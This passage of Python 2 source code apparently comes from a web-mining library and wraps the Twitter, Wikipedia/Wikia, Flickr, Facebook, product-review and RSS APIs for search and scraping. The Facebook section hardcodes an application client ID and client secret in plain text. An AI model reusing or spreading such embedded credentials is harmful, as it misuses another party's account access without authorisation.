return results
#--- TWITTER ---------------------------------------------------------------------------------------
# http://apiwiki.twitter.com/
TWITTER = "http://search.twitter.com/"
TWITTER_STREAM = "https://stream.twitter.com/1/statuses/filter.json"
TWITTER_STATUS = "https://twitter.com/%s/status/%s"
TWITTER_LICENSE = api.license["Twitter"]
TWITTER_HASHTAG = re.compile(r"(\s|^)(#[a-z0-9_\-]+)", re.I) # Word starts with "#".
TWITTER_RETWEET = re.compile(r"(\s|^RT )(@[a-z0-9_\-]+)", re.I) # Word starts with "RT @".
class Twitter(SearchEngine):
def __init__(self, license=None, throttle=0.5, language=None):
SearchEngine.__init__(self, license or TWITTER_LICENSE, throttle, language)
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=False, **kwargs):
""" Returns a list of results from Twitter for the given query.
- type : SEARCH or TRENDS,
- start: maximum 1500 results (10 for trends) => start 1-15 with count=100, 1500/count,
- count: maximum 100, or 10 for trends.
There is an hourly limit of 150+ queries (actual amount undisclosed).
"""
if type != SEARCH:
raise SearchEngineTypeError
if not query or count < 1 or start < 1 or start > 1500 / count:
return Results(TWITTER, query, type)
# 1) Construct request URL.
url = URL(TWITTER + "search.json?", method=GET)
url.query = {
"q": query,
"page": start,
"rpp": min(count, 100)
}
if "geo" in kwargs:
# Filter by location with geo=(latitude, longitude, radius).
# It can also be a (latitude, longitude)-tuple with default radius "10km".
url.query["geocode"] = ",".join((map(str, kwargs.pop("geo")) + ["10km"])[:3])
# 2) Restrict language.
url.query["lang"] = self.language or ""
# 3) Parse JSON response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = URL(url).download(cached=cached, **kwargs)
except HTTP420Error:
raise SearchEngineLimitError
data = json.loads(data)
results = Results(TWITTER, query, type)
results.total = None
for x in data.get("results", data.get("trends", [])):
r = Result(url=None)
r.url = self.format(TWITTER_STATUS % (x.get("from_user"), x.get("id_str")))
r.text = self.format(x.get("text"))
r.date = self.format(x.get("created_at", data.get("as_of")))
r.author = self.format(x.get("from_user"))
r.profile = self.format(x.get("profile_image_url")) # Profile picture URL.
r.language = self.format(x.get("iso_language_code"))
results.append(r)
return results
def trends(self, **kwargs):
""" Returns a list with 10 trending topics on Twitter.
"""
url = URL("https://api.twitter.com/1/trends/1.json")
kwargs.setdefault("cached", False)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
data = url.download(**kwargs)
data = json.loads(data)
return [u(x.get("name")) for x in data[0].get("trends", [])]
def stream(self, query):
""" Returns a live stream of Result objects for the given query.
"""
url = URL(TWITTER_STREAM)
url.query.update({
"track": query,
"oauth_version": "1.0",
"oauth_nonce": oauth.nonce(),
"oauth_timestamp": oauth.timestamp(),
"oauth_consumer_key": self.license[0],
"oauth_token": self.license[2][0],
"oauth_signature_method": "HMAC-SHA1"
})
url.query["oauth_signature"] = oauth.sign(url.string.split("?")[0], url.query, GET,
self.license[1],
self.license[2][1])
return TwitterStream(url, delimiter="\n", format=self.format)
class TwitterStream(Stream):
def __init__(self, socket, delimiter="\n", format=lambda s: s):
Stream.__init__(self, socket, delimiter)
self.format = format
def parse(self, data):
""" TwitterStream.queue will populate with Result objects as
TwitterStream.update() is called iteratively.
"""
x = json.loads(data)
r = Result(url=None)
r.url = self.format(TWITTER_STATUS % (x.get("user", {}).get("screen_name"), x.get("id_str")))
r.text = self.format(x.get("text"))
r.date = self.format(x.get("created_at"))
r.author = self.format(x.get("user", {}).get("screen_name"))
r.profile = self.format(x.get("profile_image_url"))
r.language = self.format(x.get("iso_language_code"))
return r
def author(name):
""" Returns a Twitter query-by-author-name that can be passed to Twitter.search().
For example: Twitter().search(author("tom_de_smedt"))
"""
return "from:%s" % name
def hashtags(string):
""" Returns a list of hashtags (words starting with a #hash) from a tweet.
"""
return [b for a, b in TWITTER_HASHTAG.findall(string)]
def retweets(string):
""" Returns a list of retweets (words starting with a RT @author) from a tweet.
"""
return [b for a, b in TWITTER_RETWEET.findall(string)]
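# For example (illustrative):
#print hashtags("Big #data and #NLP")       # => ["#data", "#NLP"]
#print retweets("RT @nodebox: new release") # => ["@nodebox"]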
#stream = Twitter().stream("cat")
#for i in range(10):
# stream.update()
# for tweet in reversed(stream):
# print tweet.text
# print tweet.url
# print
#stream.clear()
#--- MEDIAWIKI -------------------------------------------------------------------------------------
# http://en.wikipedia.org/w/api.php
WIKIA = "http://wikia.com"
WIKIPEDIA = "http://wikipedia.com"
WIKIPEDIA_LICENSE = api.license["Wikipedia"]
MEDIAWIKI_LICENSE = None
MEDIAWIKI = "http://{SUBDOMAIN}.{DOMAIN}{API}"
# Pattern for meta links (e.g. Special:RecentChanges).
# http://en.wikipedia.org/wiki/Main_namespace
MEDIAWIKI_NAMESPACE = ["Main", "User", "Wikipedia", "File", "MediaWiki", "Template", "Help", "Category", "Portal", "Book"]
MEDIAWIKI_NAMESPACE += [s+" talk" for s in MEDIAWIKI_NAMESPACE] + ["Talk", "Special", "Media"]
MEDIAWIKI_NAMESPACE += ["WP", "WT", "MOS", "C", "CAT", "Cat", "P", "T", "H", "MP", "MoS", "Mos"]
_mediawiki_namespace = re.compile(r"^"+"|".join(MEDIAWIKI_NAMESPACE)+":", re.I)
# Pattern to identify disambiguation pages.
MEDIAWIKI_DISAMBIGUATION = "<a href=\"/wiki/Help:Disambiguation\" title=\"Help:Disambiguation\">disambiguation</a> page"
# Pattern to identify references, e.g. [12]
MEDIAWIKI_REFERENCE = r"\s*\[[0-9]{1,3}\]"
class MediaWiki(SearchEngine):
def __init__(self, license=None, throttle=5.0, language="en"):
SearchEngine.__init__(self, license or MEDIAWIKI_LICENSE, throttle, language)
@property
def _url(self):
# Must be overridden in a subclass; see Wikia and Wikipedia.
return None
@property
def MediaWikiArticle(self):
return MediaWikiArticle
@property
def MediaWikiSection(self):
return MediaWikiSection
@property
def MediaWikiTable(self):
return MediaWikiTable
def __iter__(self):
return self.all()
def all(self, **kwargs):
""" Returns an iterator over all MediaWikiArticle objects.
Optional parameters can include those passed to
MediaWiki.list(), MediaWiki.search() and URL.download().
"""
for title in self.list(**kwargs):
yield self.search(title, **kwargs)
articles = all
def list(self, namespace=0, start=None, count=100, cached=True, **kwargs):
""" Returns an iterator over all article titles (for a given namespace id).
"""
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
# Fetch article titles (default) or a custom id.
id = kwargs.pop("_id", "title")
# Loop endlessly (= until the last request no longer yields an "apcontinue").
# See: http://www.mediawiki.org/wiki/API:Allpages
while start != -1:
url = URL(self._url, method=GET, query={
"action": "query",
"list": "allpages",
"apnamespace": namespace,
"apfrom": start or "",
"aplimit": min(count, 500),
"apfilterredir": "nonredirects",
"format": "json"
})
data = url.download(cached=cached, **kwargs)
data = json.loads(data)
for x in data.get("query", {}).get("allpages", {}):
if x.get(id):
yield x[id]
start = data.get("query-continue", {}).get("allpages", {})
start = start.get("apcontinue", start.get("apfrom", -1))
raise StopIteration
def search(self, query, type=SEARCH, start=1, count=1, sort=RELEVANCY, size=None, cached=True, **kwargs):
""" Returns a MediaWikiArticle for the given query.
The query is case-sensitive, for example on Wikipedia:
- "tiger" = Panthera tigris,
- "TIGER" = Topologically Integrated Geographic Encoding and Referencing.
"""
if type != SEARCH:
raise SearchEngineTypeError
if count < 1:
return None
# 1) Construct request URL (e.g., Wikipedia for a given language).
url = URL(self._url, method=GET, query={
"action": "parse",
"page": query.replace(" ","_"),
"redirects": 1,
"format": "json"
})
# 2) Parse JSON response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("timeout", 30) # Parsing the article takes some time.
kwargs.setdefault("throttle", self.throttle)
data = url.download(cached=cached, **kwargs)
data = json.loads(data)
data = data.get("parse", {})
a = self._parse_article(data, query=query)
a = self._parse_article_sections(a, data)
a = self._parse_article_section_structure(a)
if not a.html or "id=\"noarticletext\"" in a.html:
return None
return a
def _parse_article(self, data, **kwargs):
return self.MediaWikiArticle(
title = plaintext(data.get("displaytitle", data.get("title", ""))),
source = data.get("text", {}).get("*", ""),
disambiguation = data.get("text", {}).get("*", "").find(MEDIAWIKI_DISAMBIGUATION) >= 0,
links = [x["*"] for x in data.get("links", []) if not _mediawiki_namespace.match(x["*"])],
categories = [x["*"] for x in data.get("categories", [])],
external = [x for x in data.get("externallinks", [])],
media = [x for x in data.get("images", [])],
languages = dict([(x["lang"], x["*"]) for x in data.get("langlinks", [])]),
language = self.language,
parser = self, **kwargs)
def _parse_article_sections(self, article, data):
# If "References" is a section in the article,
# the HTML will contain a marker <h*><span class="mw-headline" id="References">.
# http://en.wikipedia.org/wiki/Section_editing
t = article.title
d = 0
i = 0
for x in data.get("sections", {}):
a = x.get("anchor")
if a:
p = r"<h.>\s*.*?\s*<span class=\"mw-headline\" id=\"%s\">" % a
p = re.compile(p)
m = p.search(article.source, i)
if m:
j = m.start()
article.sections.append(self.MediaWikiSection(article,
title = t,
start = i,
stop = j,
level = d))
t = x.get("line", "")
d = int(x.get("level", 2)) - 1
i = j
return article
def _parse_article_section_structure(self, article):
# Sections with higher level are children of previous sections with lower level.
for i, s2 in enumerate(article.sections):
for s1 in reversed(article.sections[:i]):
if s1.level < s2.level:
s2.parent = s1
s1.children.append(s2)
break
return article
class MediaWikiArticle:
def __init__(self, title=u"", source=u"", links=[], categories=[], languages={}, disambiguation=False, **kwargs):
""" A MediaWiki article returned from MediaWiki.search().
MediaWikiArticle.string contains the HTML content.
"""
self.title = title # Article title.
self.source = source # Article HTML content.
self.sections = [] # Article sections.
self.links = links # List of titles of linked articles.
self.categories = categories # List of categories. As links, prepend "Category:".
self.external = [] # List of external links.
self.media = [] # List of linked media (images, sounds, ...)
self.disambiguation = disambiguation # True when the article is a disambiguation page.
self.languages = languages # Dictionary of (language, article)-items, e.g. Cat => ("nl", "Kat")
self.language = kwargs.get("language", "en")
self.parser = kwargs.get("parser", MediaWiki())
for k, v in kwargs.items():
setattr(self, k, v)
def _plaintext(self, string, **kwargs):
""" Strips HTML tags, whitespace and wiki markup from the HTML source, including:
metadata, info box, table of contents, annotations, thumbnails, disambiguation link.
This is called internally from MediaWikiArticle.string.
"""
s = string
s = strip_between("<table class=\"metadata", "</table>", s) # Metadata.
s = strip_between("<table id=\"toc", "</table>", s) # Table of contents.
s = strip_between("<table class=\"infobox", "</table>", s) # Infobox.
s = strip_between("<table class=\"wikitable", "</table>", s) # Table.
s = strip_element(s, "table", "class=\"navbox") # Navbox.
s = strip_between("<div id=\"annotation", "</div>", s) # Annotations.
s = strip_between("<div class=\"dablink", "</div>", s) # Disambiguation message.
s = strip_between("<div class=\"magnify", "</div>", s) # Thumbnails.
s = strip_between("<div class=\"thumbcaption", "</div>", s) # Thumbnail captions.
s = re.sub(r"<img class=\"tex\".*?/>", "[math]", s) # LaTex math images.
s = plaintext(s, **kwargs)
s = re.sub(r"\[edit\]\s*", "", s) # [edit] is language dependent (e.g. nl => "[bewerken]")
s = s.replace("[", " [").replace(" [", " [") # Space before inline references.
return s
def plaintext(self, **kwargs):
return self._plaintext(self.source, **kwargs)
@property
def html(self):
return self.source
@property
def string(self):
return self.plaintext()
def __repr__(self):
return "MediaWikiArticle(title=%s)" % repr(self.title)
class MediaWikiSection:
def __init__(self, article, title=u"", start=0, stop=0, level=1):
""" A (nested) section in the content of a MediaWikiArticle.
"""
self.article = article # MediaWikiArticle the section is part of.
self.parent = None # MediaWikiSection the section is part of.
self.children = [] # MediaWikiSections belonging to this section.
self.title = title # Section title.
self._start = start # Section start index in MediaWikiArticle.string.
self._stop = stop # Section stop index in MediaWikiArticle.string.
self._level = level # Section depth (main title + intro = level 0).
self._tables = None
def plaintext(self, **kwargs):
return self.article._plaintext(self.source, **kwargs)
@property
def source(self):
return self.article.source[self._start:self._stop]
@property
def html(self):
return self.source
@property
def string(self):
return self.plaintext()
@property
def content(self):
# ArticleSection.string, minus the title.
s = self.plaintext()
if s == self.title or s.startswith(self.title+"\n"):
return s[len(self.title):].lstrip()
return s
@property
def tables(self):
""" Yields a list of MediaWikiTable objects in the section.
"""
if self._tables is None:
self._tables = []
b = "<table class=\"wikitable\"", "</table>"
p = self.article._plaintext
f = find_between
for s in f(b[0], b[1], self.source):
t = self.article.parser.MediaWikiTable(self,
title = p((f(r"<caption.*?>", "</caption>", s) + [""])[0]),
source = b[0] + s + b[1]
)
for i, row in enumerate(f(r"<tr", "</tr>", s)):
# 1) Parse <td> and <th> content and format it as plain text.
# 2) Parse <td colspan=""> attribute, duplicate spanning cells.
# 3) For <th> in the first row, update MediaWikiTable.headers.
r1 = f(r"<t[d|h]", r"</t[d|h]>", row)
r1 = (((f(r'colspan="', r'"', v)+[1])[0], v[v.find(">")+1:]) for v in r1)
r1 = ((int(n), v) for n, v in r1)
r2 = []; [[r2.append(p(v)) for j in range(n)] for n, v in r1]
if i == 0 and "</th>" in row:
t.headers = r2
else:
t.rows.append(r2)
self._tables.append(t)
return self._tables
@property
def level(self):
return self._level
depth = level
def __repr__(self):
return "MediaWikiSection(title='%s')" % bytestring(self.title)
class MediaWikiTable:
def __init__(self, section, title=u"", headers=[], rows=[], source=u""):
""" A <table class="wikitable> in a MediaWikiSection.
"""
self.section = section # MediaWikiSection the table is part of.
self.source = source # Table HTML.
self.title = title # Table title.
self.headers = headers # List of table headers.
self.rows = rows # List of table rows, each a list of cells.
@property
def html(self):
return self.source
def __repr__(self):
return "MediaWikiTable(title='%s')" % bytestring(self.title)
#--- MEDIAWIKI: WIKIPEDIA --------------------------------------------------------------------------
class Wikipedia(MediaWiki):
def __init__(self, license=None, throttle=5.0, language="en"):
""" Mediawiki search engine for http://[language].wikipedia.org.
"""
SearchEngine.__init__(self, license or WIKIPEDIA_LICENSE, throttle, language)
self._subdomain = language
@property
def _url(self):
s = MEDIAWIKI
s = s.replace("{SUBDOMAIN}", self._subdomain)
s = s.replace("{DOMAIN}", "wikipedia.org")
s = s.replace("{API}", '/w/api.php')
return s
@property
def MediaWikiArticle(self):
return WikipediaArticle
@property
def MediaWikiSection(self):
return WikipediaSection
@property
def MediaWikiTable(self):
return WikipediaTable
class WikipediaArticle(MediaWikiArticle):
def download(self, media, **kwargs):
""" Downloads an item from MediaWikiArticle.media and returns the content.
Note: images on Wikipedia can be quite large, and this method uses screen-scraping,
so Wikipedia might not like it that you download media in this way.
To save the media in a file:
data = article.download(media)
open(filename+extension(media),"w").write(data)
"""
url = "http://%s.wikipedia.org/wiki/File:%s" % (self.__dict__.get("language", "en"), media)
if url not in cache:
time.sleep(1)
data = URL(url).download(**kwargs)
data = re.search(r"upload.wikimedia.org/.*?/%s" % media, data)
data = data and URL("http://" + data.group(0)).download(**kwargs) or None
return data
def __repr__(self):
return "WikipediaArticle(title=%s)" % repr(self.title)
class WikipediaSection(MediaWikiSection):
def __repr__(self):
return "WikipediaSection(title='%s')" % bytestring(self.title)
class WikipediaTable(MediaWikiTable):
def __repr__(self):
return "WikipediaTable(title='%s')" % bytestring(self.title)
#article = Wikipedia().search("cat")
#for section in article.sections:
# print " "*(section.level-1) + section.title
#if article.media:
# data = article.download(article.media[2])
# f = open(article.media[2], "w")
# f.write(data)
# f.close()
#
#article = Wikipedia(language="nl").search("borrelnootje")
#print article.string
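#
# A hedged sketch (not from the original examples): MediaWiki.list() iterates article
# titles and MediaWikiSection.tables parses <table class="wikitable"> markup;
# the article title "Belgium" is only an illustration.
#
#for i, title in enumerate(Wikipedia().list(start="A")):
#    if i >= 10: break
#    print title
#
#article = Wikipedia().search("Belgium")
#for section in article.sections:
#    for table in section.tables:
#        print table.title, table.headers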
#--- MEDIAWIKI: WIKIA ------------------------------------------------------------------------------
class Wikia(MediaWiki):
def __init__(self, domain="www", license=None, throttle=5.0, language="en"):
""" Mediawiki search engine for http://[domain].wikia.com.
"""
SearchEngine.__init__(self, license or MEDIAWIKI_LICENSE, throttle, language)
self._subdomain = domain
@property
def _url(self):
s = MEDIAWIKI
s = s.replace("{SUBDOMAIN}", self._subdomain)
s = s.replace("{DOMAIN}", "wikia.com")
s = s.replace("{API}", '/api.php')
return s
@property
def MediaWikiArticle(self):
return WikiaArticle
@property
def MediaWikiSection(self):
return WikiaSection
@property
def MediaWikiTable(self):
return WikiaTable
def all(self, **kwargs):
if kwargs.pop("batch", True):
# We can take advantage of Wikia's search API to reduce bandwidth.
# Instead of executing a query to retrieve each article,
# we query for a batch of (10) articles.
iterator = self.list(_id="pageid", **kwargs)
while True:
batch, done = [], False
try:
for i in range(10): batch.append(iterator.next())
except StopIteration:
done = True # No more articles, finish batch and raise StopIteration.
url = URL(self._url.replace("api.php", "wikia.php"), method=GET, query={
"controller": "WikiaSearch",
"method": "getPages",
"ids": '|'.join(str(id) for id in batch),
"format": "json"
})
kwargs.setdefault("unicode", True)
kwargs.setdefault("cached", True)
kwargs["timeout"] = 10 * (1 + len(batch))
data = url.download(**kwargs)
data = json.loads(data)
for x in (data or {}).get("pages", {}).values():
yield WikiaArticle(title=x.get("title", ""), source=x.get("html", ""))
if done:
raise StopIteration
for title in self.list(**kwargs):
yield self.search(title, **kwargs)
class WikiaArticle(MediaWikiArticle):
def __repr__(self):
return "WikiaArticle(title=%s)" % repr(self.title)
class WikiaSection(MediaWikiSection):
def __repr__(self):
return "WikiaSection(title='%s')" % bytestring(self.title)
class WikiaTable(MediaWikiTable):
def __repr__(self):
return "WikiaTable(title='%s')" % bytestring(self.title)
#--- FLICKR ----------------------------------------------------------------------------------------
# http://www.flickr.com/services/api/
FLICKR = "http://api.flickr.com/services/rest/"
FLICKR_LICENSE = api.license["Flickr"]
INTERESTING = "interesting"
class Flickr(SearchEngine):
def __init__(self, license=None, throttle=5.0, language=None):
SearchEngine.__init__(self, license or FLICKR_LICENSE, throttle, language)
def search(self, query, type=IMAGE, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
""" Returns a list of results from Flickr for the given query.
Retrieving the URL of a result (i.e. image) requires an additional query.
- type : SEARCH, IMAGE,
- start: maximum undefined,
- count: maximum 500,
- sort : RELEVANCY, LATEST or INTERESTING.
There is no daily limit.
"""
if type not in (SEARCH, IMAGE):
raise SearchEngineTypeError
if not query or count < 1 or start < 1 or start > 500/count:
return Results(FLICKR, query, IMAGE)
# 1) Construct request URL.
url = FLICKR+"?"
url = URL(url, method=GET, query={
"api_key": self.license or "",
"method": "flickr.photos.search",
"text": query.replace(" ", "_"),
"page": start,
"per_page": min(count, 500),
"sort": { RELEVANCY: "relevance",
LATEST: "date-posted-desc",
INTERESTING: "interestingness-desc" }.get(sort)
})
if kwargs.get("copyright", True) is False:
# With copyright=False, only returns Public Domain and Creative Commons images.
# http://www.flickr.com/services/api/flickr.photos.licenses.getInfo.html
# 5: "Attribution-ShareAlike License"
# 7: "No known copyright restriction"
url.query["license"] = "5,7"
# 2) Parse XML response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
data = url.download(cached=cached, **kwargs)
data = xml.dom.minidom.parseString(bytestring(data))
results = Results(FLICKR, query, IMAGE)
results.total = int(data.getElementsByTagName("photos")[0].getAttribute("total"))
for x in data.getElementsByTagName("photo"):
r = FlickrResult(url=None)
r.__dict__["_id"] = x.getAttribute("id")
r.__dict__["_size"] = size
r.__dict__["_license"] = self.license
r.__dict__["_throttle"] = self.throttle
r.text = self.format(x.getAttribute("title"))
r.author = self.format(x.getAttribute("owner"))
results.append(r)
return results
class FlickrResult(Result):
@property
def url(self):
# Retrieving the url of a FlickrResult (i.e. image location) requires another query.
# Note: the "Original" size no longer appears in the response,
# so Flickr might not like it if we download it.
url = FLICKR + "?method=flickr.photos.getSizes&photo_id=%s&api_key=%s" % (self._id, self._license)
data = URL(url).download(throttle=self._throttle, unicode=True)
data = xml.dom.minidom.parseString(bytestring(data))
size = { TINY: "Thumbnail",
SMALL: "Small",
MEDIUM: "Medium",
LARGE: "Original" }.get(self._size, "Medium")
for x in data.getElementsByTagName("size"):
if size == x.getAttribute("label"):
return x.getAttribute("source")
if size == "Original":
url = x.getAttribute("source")
url = url[:-len(extension(url))-2] + "_o" + extension(url)
return u(url)
#images = Flickr().search("kitten", count=10, size=SMALL)
#for img in images:
# print bytestring(img.description)
# print img.url
#
#data = img.download()
#f = open("kitten"+extension(img.url), "w")
#f.write(data)
#f.close()
#--- FACEBOOK --------------------------------------------------------------------------------------
# Facebook public status updates.
# https://developers.facebook.com/docs/reference/api/
FACEBOOK = "https://graph.facebook.com/"
FACEBOOK_LICENSE = api.license["Facebook"]
FEED = "feed" # Facebook timeline.
COMMENTS = "comments" # Facebook comments (for a given news feed post).
LIKES = "likes" # Facebook likes (for a given post or comment).
FRIENDS = "friends" # Facebook friends (for a given profile id).
class FacebookResult(Result):
def __repr__(self):
return "Result(id=%s)" % repr(self.id)
class Facebook(SearchEngine):
def __init__(self, license=None, throttle=1.0, language=None):
SearchEngine.__init__(self, license, throttle, language)
@property
def _token(self):
# Yields the "application access token" (stored in api.license["Facebook"]).
# With this license, we can view public content.
# To view more information, we need a "user access token" as license key.
# This token can be retrieved manually from:
# http://www.clips.ua.ac.be/media/pattern-fb.html
# Or parsed from this URL:
# https://graph.facebook.com/oauth/authorize?type=user_agent
# &client_id=332061826907464
# &redirect_uri=http%3A%2F%2Fwww.clips.ua.ac.be/media/pattern-facebook-token.html
# &scope=read_stream,user_birthday,user_likes,user_photos,friends_birthday,friends_likes
# The token is valid for a limited duration.
return URL(FACEBOOK + "oauth/access_token?", query={
"grant_type": "client_credentials",
"client_id": "332061826907464",
"client_secret": "81ff4204e73ecafcd87635a3a3683fbe"
}).download().split("=")[1]
def search(self, query, type=SEARCH, start=1, count=10, cached=False, **kwargs):
""" Returns a list of results from Facebook public status updates for the given query.
- query: string, or Result.id for NEWS and COMMENTS,
- type : SEARCH,
- start: 1,
- count: maximum 100 for SEARCH and NEWS, 1000 for COMMENTS and LIKES.
There is an hourly limit of roughly 600 queries (the actual amount is undisclosed).
"""
# Facebook.search(type=SEARCH) returns public posts + author.
# Facebook.search(type=NEWS) returns posts for the given author (id | alias | "me").
# Facebook.search(type=COMMENTS) returns comments for the given post id.
# Facebook.search(type=LIKES) returns authors for the given author, post or comments.
# An author is a Facebook user or other entity (e.g., a product page).
if type not in (SEARCH, NEWS, COMMENTS, LIKES, FRIENDS):
raise SearchEngineTypeError
if type in (SEARCH, NEWS):
max = 100
if type in (COMMENTS, LIKES):
max = 1000
if type in (FRIENDS,):
max = 10000
if not query or start < 1 or count < 1:
return Results(FACEBOOK, query, SEARCH)
if isinstance(query, FacebookResult):
query = query.id
# 1) Construct request URL.
if type == SEARCH:
url = FACEBOOK + type
url = URL(url, method=GET, query={
"q": query,
"type": "post",
"fields": ",".join(("id", "link", "message", "created_time", "from")),
"offset": (start-1) * min(count, max),
"limit": (start-0) * min(count, max),
})
if type in (NEWS, FEED, COMMENTS, LIKES, FRIENDS):
url = FACEBOOK + (u(query) or "me").replace(FACEBOOK, "") + "/" + type.replace("news", "feed")
url = URL(url, method=GET, query={
"access_token": self.license,
"offset": (start-1) * min(count, max),
"limit": (start-0) * min(count, max)
})
# 2) Parse JSON response.
kwargs.setdefault("cached", cached)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = URL(url).download(**kwargs)
except HTTP400BadRequest:
raise HTTP401Authentication
data = json.loads(data)
results = Results(FACEBOOK, query, SEARCH)
results.total = None
for x in data.get("data", []):
r = FacebookResult(url=None)
r.id = self.format(x.get("id"))
r.url = self.format(x.get("link"))
r.text = self.format(x.get("story", x.get("message")))
r.date = self.format(x.get("created_time"))
# Store likes & comments count as int, author as (id, name)-tuple
# (by default Result will store everything as Unicode strings).
s = lambda r, k, v: dict.__setitem__(r, k, v)
s(r, "likes", \
self.format(x.get("like_count", x.get("likes", {}).get("count", 0))) + 0)
s(r, "comments", \
self.format(x.get("comments", {}).get("count", 0)) + 0)
s(r, "author", (
u(self.format(x.get("from", {}).get("id", ""))), \
u(self.format(x.get("from", {}).get("name", "")))))
# Replace Result.text with author name for likes.
if type in (LIKES, FRIENDS):
s(r, "author", (
u(self.format(x.get("id", ""))),
u(self.format(x.get("name", "")))))
r.text = \
self.format(x.get("name"))
# Replace Result.url Facebook URL with object id.
if r.url.startswith("http://www.facebook.com/photo"):
r.url = x.get("picture", r.url)
# Replace Result.url Facebook URL with full-size image.
if r.url.startswith("http://www.facebook.com/") and \
r.url.split("/")[-1].split("?")[0].isdigit():
r.url = r.url.split("/")[-1].split("?")[0].replace("_s", "_b")
results.append(r)
return results
def profile(self, id=None, **kwargs):
""" For the given author id or alias,
returns a (id, name, date of birth, gender, locale)-tuple.
"""
url = FACEBOOK + (u(id or "me")).replace(FACEBOOK, "")
url = URL(url, method=GET, query={"access_token": self.license})
kwargs.setdefault("cached", False)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = URL(url).download(**kwargs)
data = json.loads(data)
except HTTP400BadRequest:
raise HTTP401Authentication
return (
u(data.get("id", "")),
u(data.get("name", "")),
u(data.get("birthday", "")),
u(data.get("gender", "")[:1]),
u(data.get("locale", ""))
)
#license = "" # Generate a license key at: http://www.clips.ua.ac.be/media/pattern-fb.html
#fb = Facebook(license)
#me = fb.profile()[0]
#for r in fb.search(me, type=NEWS, count=10):
# print r.id
# print r.text
# print r.url
# if r.comments > 0:
# print "%s comments:" % r.comments
# print [(r.text, r.author) for r in fb.search(r, type=COMMENTS)]
# if r.likes > 0:
# print "%s likes:" % r.likes
# print [r.author for r in fb.search(r, type=LIKES)]
# print
#--- PRODUCT REVIEWS -------------------------------------------------------------------------------
PRODUCTWIKI = "http://api.productwiki.com/connect/api.aspx"
PRODUCTWIKI_LICENSE = api.license["Products"]
class Products(SearchEngine):
def __init__(self, license=None, throttle=5.0, language=None):
SearchEngine.__init__(self, license or PRODUCTWIKI_LICENSE, throttle, language)
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
""" Returns a list of results from Productwiki for the given query.
Each Result.reviews is a list of (review, score)-items.
- type : SEARCH,
- start: maximum undefined,
- count: 20,
- sort : RELEVANCY.
There is no daily limit.
"""
if type != SEARCH:
raise SearchEngineTypeError
if not query or start < 1 or count < 1:
return Results(PRODUCTWIKI, query, type)
# 1) Construct request URL.
url = PRODUCTWIKI+"?"
url = URL(url, method=GET, query={
"key": self.license or "",
"q": query,
"page" : start,
"op": "search",
"fields": "proscons", # "description,proscons" is heavy.
"format": "json"
})
# 2) Parse JSON response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
data = URL(url).download(cached=cached, **kwargs)
data = json.loads(data)
results = Results(PRODUCTWIKI, query, type)
results.total = None
for x in data.get("products", [])[:count]:
r = Result(url=None)
r.__dict__["title"] = u(x.get("title"))
r.__dict__["text"] = u(x.get("text"))
r.__dict__["reviews"] = []
reviews = x.get("community_review") or {}
for p in reviews.get("pros", []):
r.reviews.append((p.get("text", ""), int(p.get("score")) or +1))
for p in reviews.get("cons", []):
r.reviews.append((p.get("text", ""), int(p.get("score")) or -1))
r.__dict__["score"] = int(sum(score for review, score in r.reviews))
results.append(r)
# Highest score first.
results.sort(key=lambda r: r.score, reverse=True)
return results
#for r in Products().search("tablet"):
# print r.title
# print r.score
# print r.reviews
# print
#--- NEWS FEED -------------------------------------------------------------------------------------
# Based on the Universal Feed Parser by Mark Pilgrim:
# http://www.feedparser.org/
class Newsfeed(SearchEngine):
def __init__(self, license=None, throttle=1.0, language=None):
SearchEngine.__init__(self, license, throttle, language)
def search(self, query, type=NEWS, start=1, count=10, sort=LATEST, size=SMALL, cached=True, **kwargs):
""" Returns a list of results from the given RSS or Atom newsfeed URL.
"""
if type != NEWS:
raise SearchEngineTypeError
if not query or start < 1 or count < 1:
return Results(query, query, NEWS)
# 1) Construct request URL.
# 2) Parse RSS/Atom response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
tags = kwargs.pop("tags", [])
data = URL(query).download(cached=cached, **kwargs)
data = feedparser.parse(bytestring(data))
results = Results(query, query, NEWS)
results.total = None
for x in data["entries"][:count]:
s = "\n\n".join([v.get("value") for v in x.get("content", [])]) or x.get("summary")
r = Result(url=None)
r.id = self.format(x.get("id"))
r.url = self.format(x.get("link"))
r.title = self.format(x.get("title"))
r.text = self.format(s)
r.date = self.format(x.get("updated"))
r.author = self.format(x.get("author"))
r.language = self.format(x.get("content") and \
x.get("content")[0].get("language") or \
data.get("language"))
for tag in tags:
# Parse custom tags.
# Newsfeed.search(tags=["dc:identifier"]) => Result.dc_identifier.
tag = tag.replace(":", "_")
r[tag] = self.format(x.get(tag))
results.append(r)
return results
feeds = {
"Nature": "http://feeds.nature.com/nature/rss/current",
"Science": "http://www.sciencemag.org/rss/podcast.xml",
"Herald Tribune": "http://www.iht.com/rss/frontpage.xml",
"TIME": "http://feeds.feedburner.com/time/topstories",
"CNN": "http://rss.cnn.com/rss/edition.rss",
}
#for r in Newsfeed().search(feeds["Nature"]):
# print r.title
# print r.author
# print r.url
# print plaintext(r.text)
# print
#--- QUERY -----------------------------------------------------------------------------------------
def query(string, service=GOOGLE, **kwargs):
""" Returns the list of search query results from the given service.
For service=WIKIPEDIA, this is a single WikipediaArticle or None.
"""
service = service.lower()
if service in (GOOGLE, "google", "g"):
engine = Google
if service in (YAHOO, "yahoo", "y!"):
engine = Yahoo
if service in (BING, "bing"):
engine = Bing
if service in (TWITTER, "twitter"):
engine = Twitter
if service in (FACEBOOK, "facebook", "fb"):
engine = Facebook
if service in (WIKIA, "wikia"):
engine = Wikia
if service in (WIKIPEDIA, "wikipedia", "wp"):
engine = Wikipedia
if service in (FLICKR, "flickr"):
engine = Flickr
try:
kw = {}
for a in ("license", "throttle", "language"):
if a in kwargs:
